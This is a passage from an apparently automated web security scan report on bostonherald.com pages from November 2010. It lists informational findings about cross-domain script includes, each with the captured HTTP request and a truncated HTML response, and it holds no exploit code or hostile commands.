http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20101106mansion_to_be_auctioned_site_once_owned_by_infamous_tyco_exec/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:04:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.33. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:01:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 75254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.34. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20101107critics_hit_feds_appraisal_rules/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:59:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.35. http://bostonherald.com/business/real_estate/view/20101107homeowners_say_loan_mods_led_them_to_foreclosure/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101107homeowners_say_loan_mods_led_them_to_foreclosure/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20101107homeowners_say_loan_mods_led_them_to_foreclosure/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:02:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.36. http://bostonherald.com/business/technology/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/technology/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/technology/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:37:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.37. http://bostonherald.com/business/womens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/womens/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE

Request

GET /business/womens/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_alt_beta
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.38. http://bostonherald.com/crossword/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/crossword/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /crossword/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:13:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.39. http://bostonherald.com/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /entertainment/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:12:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.40. http://bostonherald.com/entertainment/arts_culture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/arts_culture/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/arts_culture/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:16:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
